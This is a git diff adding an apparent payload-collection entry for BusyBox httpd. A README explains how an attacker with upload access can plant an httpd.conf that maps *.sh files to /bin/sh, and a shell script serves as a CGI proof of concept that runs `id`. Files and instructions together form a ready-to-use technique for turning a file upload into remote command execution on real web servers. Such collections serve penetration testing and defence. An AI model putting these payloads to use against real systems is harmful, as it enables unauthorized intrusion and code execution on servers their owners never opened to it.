diff --git a/Upload insecure files/Busybox httpd.conf/README.md b/Upload insecure files/Busybox httpd.conf/README.md
new file mode 100644
index 0000000..67f71a6
--- /dev/null
+++ b/Upload insecure files/Busybox httpd.conf/README.md	
@@ -0,0 +1,11 @@
+If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter.
+
+Details from Busybox httpd.c
+
+https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60
+
+> *.php:/path/php   # run xxx.php through an interpreter`
+
+>  If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration.
+
+Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you cant see these in Burp :)  
diff --git a/Upload insecure files/Busybox httpd.conf/httpd.conf b/Upload insecure files/Busybox httpd.conf/httpd.conf
new file mode 100644
index 0000000..da4bd65
--- /dev/null
+++ b/Upload insecure files/Busybox httpd.conf/httpd.conf	
@@ -0,0 +1 @@
+*.sh:/bin/sh
diff --git a/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh b/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh
new file mode 100644
index 0000000..0282e4b
--- /dev/null
+++ b/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh	
@@ -0,0 +1,3 @@
+echo "Content-type: text/html"
+echo ""
+echo `id`